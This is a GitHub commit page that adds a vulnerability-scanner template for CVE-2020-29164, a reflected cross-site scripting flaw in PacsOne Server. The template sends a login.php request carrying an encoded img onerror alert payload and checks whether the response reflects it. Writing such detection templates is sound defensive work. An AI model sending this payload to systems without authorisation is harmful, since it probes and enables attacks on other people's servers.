Skip to content

Commit

Permalink
Create PacsOne-Server-xss-cve-2020-29164.yaml
Browse files Browse the repository at this point in the history
  • Loading branch information
ghsec authored Feb 3, 2021
1 parent 698aa67 commit 6ec7a9d
Showing 1 changed file with 21 additions and 0 deletions.
21 changes: 21 additions & 0 deletions cves/PacsOne-Server-xss-cve-2020-29164.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
id: PacsOne-Server-xss-cve-2020-29164
info:
name: PacsOne Server reflect xss - CVE-2020-29164
risk: High

params:
- root: "{{.BaseURL}}"

requests:
- method: GET
redirect: false
url: >-
{{.root}}/Pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
detections:
- >-
StringSearch("resBody", '<img src="" onerror="alert(1);">1</img>') && StatusCode() != 301 && StatusCode() != 302
references:
- link: https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d

0 comments on commit 6ec7a9d

Please sign in to comment.